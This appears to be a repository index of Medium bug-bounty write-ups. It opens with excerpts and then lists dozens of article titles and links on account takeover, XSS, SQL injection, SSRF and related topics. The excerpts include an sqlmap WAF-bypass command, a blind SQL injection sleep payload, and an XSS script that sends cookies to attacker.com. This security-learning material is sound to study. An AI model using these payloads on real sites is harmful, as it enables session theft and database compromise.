This repository serves as a collection of insightful and informative blog posts about cybersecurity, originally published on Medium.
As a bug hunter, it is essential to remain ethical and handle such situations professionally. Some individuals react impulsively and retaliate inappropriately in such cases. However, it’s crucial to maintain self-control.
sqlmap -u "targetlink" -p parameter --tamper=space2comment --dbs --random-agent
Using two-level encoding like this allowed us to bypass the WAF and conceal the payload.
To make such payloads more convincing, you can prepend random characters or specific terms, elevating the attack to another level.
%253c---key---%253e---key2—-%2528---emoji---%2529%253c%252f---key---%253e
As I’ve mentioned before, the reconnaissance phase is incredibly important, and you should continue your reconnaissance efforts even after finding an initial vulnerability.
Every small mistake might lead you to something much bigger, so patience and keeping your eyes open are key.
+(select*from(select(sleep(20)))a)+
With this XSS payload, you can change the location in a reflected XSS vulnerability and redirect the page.
Another favorite of mine is a payload that allows you to steal cookies:
<script>new Image().src="https://attacker.com/cookie.php?cookie="+document.cookie</script>
The system’s logic involves creating a new list from the “Create New List” section in the user profile, naming it, and then adding movies and TV series to curate a personalized list.
This list is then published on your profile. However, due to a critical oversight by the developers, it’s possible to upload XSS payloads into the list’s title field using a simple trick.
<script>
document.body.addEventListener('click', () =>
setTimeout(() =>
new Audio('https://www.myinstants.com/media/sounds/among-us-role-reveal-sound.mp3').play(), 2000),
{ once: true });
</script>
Open redirection bugs generally occur in areas designed to redirect users automatically after completing a form or triggering an action, such as through parameters like refURL, returnURL, followURL. These vulnerabilities can be exploited to manipulate users into being redirected to a malicious site after completing legitimate actions on the real website.
In the login section, when a user logs in, if the API returns a status : success and redirects you to the member-viewing frame, it is important to check for any vulnerabilities.
Similarly, when registration is successful, the app either redirects to the main frame or shows an error message. At this point, create a temporary email, register, and analyze the requests using Burp Suite.
While browsing a website, we only see the content intended for users. But wait — there’s more! Hidden files on websites may contain sensitive information like usernames, passwords, API keys, personal data, organizational secrets, cookies, or tokens.
Some files might even be left on the server by mistake. If these fall into a hacker’s hands, they could lead to a serious data breach.
Account takeover vulnerabilities are among the most critical security flaws as they allow attackers to gain full control over user accounts. There are two main types of account takeover vulnerabilities:
-
Zero-Click Account Takeover: This type does not require any interaction from the victim.
-
One-Click Account Takeover: This type requires minimal interaction, such as clicking a link.
-
Bypassing Rate Limit Protection to Account Takeover @sohailahmed0x0 Rate limit vulnerabilities are security weaknesses that occur when a system or service doesn’t properly enforce limits on how many requests a user or system can make in a given time period. Essentially, these vulnerabilities arise when the system allows excessive requests from the same source or allows the rate of requests to exceed what is typical or safe.
-
How I Found a Bug in Sony and Earned Exclusive Swag! @josekuttykunnelthazhebinu
After some analysis, I came across an interesting parameter named error. This caught my attention, and I knew it was worth digging deeper.
The url was like this:
https://target.com/my/login/errormessage?error=
I tried the text injection and when I added the injection text it was not reflecting the way I expected, then I encoded the text and when submitted it was reflecting in the page in the format as expected.
This left me with around 50–60 live subdomains. From there, I randomly picked about 20–30 subdomains and opened them all at once using a Chrome extension called “Open Multiple URLs.”
While going through the subdomains, a few immediately stood out. One of them had a “page=” parameter in the URL, which instantly caught my attention.
subfinder -d example.com -o example.txt
cat example.txt | httpx -status-code -mc 200,301 -silent
It took weeks of persistence before I found my first vulnerability. It was an IDOR (Insecure Direct Object Reference) in a small web app. By manipulating a single parameter in the URL, I could access invoices from other users.
It was like magic — one parameter changed, and the doors swung open!
After understanding the logic of the website, I found that it sends a request to assign any role to the backend without validating whether the role requires payment or not. The check is only enforced on the frontend side.
The bug here is that if I send a role change request directly to the backend, I can upgrade a member’s privileges without making any payment
-
Discovering a Critical Vulnerability in Deepseek’s Password Reset Functionality leads to Zero Click Account Takeover
-
Finding Exposed Sensitive API Keys in JS Files
https://medium.com/@bitpanic/finding-exposed-sensitive-api-keys-in-js-files-5c129fb1f2c7
-
A Security Gap (PII) in a Bus Company
https://medium.com/meetcyber/a-security-gap-pii-in-a-bus-company-ecfe972875ff
-
Exploring a New SQLi Vulnerability: A Ghauri Experience
https://medium.com/meetcyber/exploring-a-new-sqli-vulnerability-a-ghauri-experience-541c588dc00d
-
Automating Ghauri for SQLi with Bash Script
https://medium.com/meetcyber/automating-ghauri-for-sqli-with-bash-script-6ce8fb62c367
-
The Importance of Proxy Usage in Bug Hunting
https://medium.com/meetcyber/the-importance-of-proxy-usage-in-bug-hunting-9896618da7fc
-
Running DeepSeek Locally on macOS with Ollama
https://medium.com/meetcyber/running-deepseek-locally-on-macos-with-ollama-cd8cd5d6dfce
-
Mobile Pentesting with Frida: A Beginner’s Guide
https://medium.com/meetcyber/mobile-pentesting-with-frida-a-beginners-guide-996411fa0202
-
User Interface Says No, Backend Says Yes
-
Finding CSRF Vulnerabilities!
https://medium.com/@kumawatabhijeet2002/earn-by-finding-csrf-vulnerabilities-638f876918cf
-
CSRF Bypass Combined with IDOR To Complete Account Takeover!
https://medium.com/@omarzzu/csrf-bypass-combined-with-idor-to-complete-account-takeover-f4995c5946d3
-
Hijacking Sessions with IDOR and XSS— @bxmbn
https://medium.com/@bxmbn/hijacking-sessions-with-idor-and-xss-bxmbn-396f99761a85
-
Discovered a Unique Email Verification Bypass
https://medium.com/@mo9khu93r/discovered-a-unique-email-verification-bypass-47bb1e955a13
-
Extended Guide to Installing DeepSeek AI on Ubuntu
https://medium.com/meetcyber/extended-guide-to-installing-deepseek-ai-on-ubuntu-bce1529de75c
-
The Power of OSINT: Tracking Torrent Activity with Python
https://medium.com/meetcyber/the-power-of-osint-tracking-torrent-activity-with-python-a3246f5217e3
-
Admin Account Takeover via Weird Password Reset Functionality
-
Understanding Basic Chmod
https://medium.com/pndsec/understanding-basic-chmod-8b93a82baf95
-
How I Found an IDOR Vulnerability – A Responsible Disclosure Story
-
IDOR Unlocked: Accessing Unauthorized Data with a Simple Tweak!
-
Can You Find a $4,500 Bug in Google Slides in Under 3 Hours
-
Mastering 403 Forbidden Bypass Techniques
https://medium.com/@Abhijeet_kumawat_/part-2-mastering-403-forbidden-bypass-techniques-707e7880fa22
-
Basic Linux Commands
-
Exceptional $$$$Account Takeover
https://medium.com/@Tanvir0x1/exceptional-account-takeover-money-theft-via-idor-a76638ecd616
-
Bug Bounty: Hunting Open Redirect Vulnerabilities
https://medium.com/h7w/bug-bounty-hunting-open-redirect-vulnerabilities-for-46940d0cd98c
-
SQL injection with filter bypass via XML encoding
https://medium.com/@codingbolt.in/sql-injection-with-filter-bypass-via-xml-encoding-754808d7d29a
-
Exploiting Blind XSS in a Signup Page:
-
How I Made $1,000 in a Day Exposing a Critical Vulnerability
-
Bug Hunting & Automation
-
How to Find Hidden API Endpoints That Lead to Critical Bugs
-
2FA & MFA Hacks: Bypass OTP Like a Pro
https://medium.com/@verylazytech/2fa-mfa-hacks-bypass-otp-like-a-pro-verylazytech-7eb9f8c4f5c1
-
Prime Target & The Future of RSA
https://medium.com/meetcyber/prime-target-the-future-of-rsa-6e6bac4ad25b
-
Account Takeover using SSO Logins
https://medium.com/@rikeshbaniya/account-takeover-using-sso-logins-fa35f28a358b
-
DOM XSS Custom Nuclei Template
https://medium.com/meetcyber/dom-xss-custom-nuclei-template-189461186769
-
SSRF to RCE: How I Turned a Small Bug Into a Big Paycheck
-
DuckDuckGo Dorking for Bug Hunters & Pentesters
https://medium.com/developersglobal/duckduckgo-dorking-for-bug-hunters-pentesters-7c2b9b762ab9
-
From Recon to RCE
-
Bug Bounty Edition 2025: Uncommon Headers That Bypass Everything
-
How I Bypassed View-Only Mode
-
CORS Misconfigurations: How Poor Policies Open Doors to Exploits
-
1 Click ATO on a public Bugcrowd Program
https://medium.com/@68abdelrahmanmohamed/1-click-ato-on-a-public-bugcrowd-program-94ef037d0d50
-
SQL Injection Leads to $$$ Bounty
-
ARP Spoofing Lab Using Docker Compose and Wireshark
-
Hours of Recon, One Vulnerable Parameter
-
Non-English Dorks to Find Bug Bounty & VDP Programs
-
Secret Sauce in Robots.txt
-
Path Traversal Attack: How I Accessed Admin Secrets
https://medium.com/bugbountywriteup/path-traversal-attack-how-i-accessed-admin-secrets-fa5de1865031
-
Choosing the Right Naming Convention
https://medium.com/meetcyber/choosing-the-right-naming-convention-780b2b1213ae
-
Not Just a Ping: How SSRF Opened the Gateway to Internal Secrets
-
Understanding Supply Chain Attacks
https://medium.com/meetcyber/understanding-supply-chain-attacks-19f97e8116cb
-
Forbidden Knowledge: Banned Cybersecurity Reads
https://medium.com/the-first-digit/forbidden-knowledge-banned-cybersecurity-reads-a4bdba77f26e
-
The Evolution of macOS
https://medium.com/meetcyber/the-evolution-of-macos-142fad535449
-
Understanding the Core Concepts of OOP
https://medium.com/meetcyber/understanding-the-core-concepts-of-oop-0b258fbe86e4
-
Bypassing Regex Validations to Achieve RCE
-
The Hidden Dangers of Misconfigured Cloud Storage
https://medium.com/meetcyber/the-hidden-dangers-of-misconfigured-cloud-storage-c9debc08f506
-
Unsafe Eval = Unlimited Control: How a JS Sink Let Me Run Anything
-
Found a Critical Vulnerability in Snapchat
https://medium.com/meetcyber/15-000-bounty-found-a-critical-vulnerability-in-snapchat-377176a0f0eb
-
A list of tools that will help to find XSS(cross-site scripting ) vulnerability.
-
The Hidden Language: Exploiting GraphQL for Unauthorized Data Dump
-
SSRF via PDF Generator? Yes, and It Led to EC2 Metadata Access
-
Filter Failure: From HTML Injection to Full-Blown XSS via Rich Text Editors
-
POC — Remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code
-
All about XSS — Cross site scripting!
https://medium.com/@bug_vs_me/all-about-xss-cross-site-scripting-1bf764a39159
-
Think You’re Safe? Think Again: Cybersecurity Myths
https://medium.com/meetcyber/think-youre-safe-think-again-cybersecurity-myths-69090b7e7afa
-
Mastering SQL Injection Recon: Step-by-Step Guide for Bug Bounty Hunters
-
404 to Root: How a Forgotten Subdomain Led to Server Takeover
-
The $2,000 SQLi Story: Hours, Payloads, and Pure Stubbornness
https://medium.com/meetcyber/the-2-000-sqli-story-hours-payloads-and-pure-stubbornness-05eab4c7b968
-
How Blind XSS in Email Notifications Gave Me Root Alerts
-
Exploiting Security Misconfiguration to Gain Full Account Takeover
-
The Image That Spoke JavaScript
https://medium.com/@commanak46/the-image-that-spoke-javascript-bdbd368921e4
-
Wordpress Vulnerability Research
https://medium.com/the-first-digit/wordpress-vulnerability-research-a2b3043f801d
-
A Hidden Backdoor: Bypassing reCAPTCHA on the Sign-up Page
-
Hidden Tokens, Open Wallets: How I Found Payment API Keys in Production JavaScript
-
Business Logic Flaw in a Rating System and Earned €150
https://medium.com/meetcyber/business-logic-flaw-in-a-rating-system-and-earned-150-a992ceb571a1
-
Open Redirect + Referer Header = $3,000 Access Token Leak
https://medium.com/the-first-digit/open-redirect-referer-header-3-000-access-token-leak-dd45ba4bdb0c
-
How Weak Tokens Let Me Become Admin with Just a Text Editor
-
Simple 2FA Bypass Techniques for Beginners
https://medium.com/the-first-digit/simple-2fa-bypass-techniques-for-beginners-edec48befa23
-
ISC2 Certified in Cybersecurity CC exam
https://medium.com/@erkankavas/isc2-certified-in-cybersecurity-cc-exam-86cccb3d976d
-
The Most Underrated 0-Click Account Takeover Using Punycode IDN Homograph Attacks
-
The $500 Facebook Bug That Taught Me the Real Meaning of Respect
-
When Session Fixation Meets Session Confusion: A Case of Cross-User Control
-
How I Chained Recon and IDOR to Access 100's of Credit Cards
-
JavaScript Proxies — The Most Underrated Superpower in JS
-
Fail2Ban: Lightweight but Powerful Protection
https://medium.com/pndsec/fail2ban-lightweight-but-powerful-protection-79f6bf514756
-
SOC Analyst Automation: Scripts Every Analyst Should Be Using
-
HTTP Parameter Pollution: The Dirty Little Secret That Gave Me Full Backend Access
-
SSRF: When Your Server Becomes a Nosy Hacker
https://medium.com/@hettt/ssrf-when-your-server-becomes-a-nosy-hacker-part-1-f808b9513652
-
The Hidden Graph: How API Rate Limits Lied and Let Me Scrape Millions
-
Hacking a Birthday Campaign on a Food Delivery App — Bug Bounty: $1.000+
-
Just Wanted to Be a Driver, Ended Up Discovering a Time Capsule
-
How I Found My First Critical Bug: Account Takeover via Email Verification Bypass
-
Mass Message Injection and IDOR in Account Verification
-
Insecure by Design: How a Mobile API Let Me Reset Anyone’s Password With Just a Phone Number
-
Clean-Up Fail: How a Forgotten Admin Endpoint
-
I Found a Major Privacy Leak in a Popular Social App
-
Unauthorized Privilege Escalation in Role Logic
https://medium.com/@edahmed008/unauthorized-privilege-escalation-in-role-logic-5271f34e652c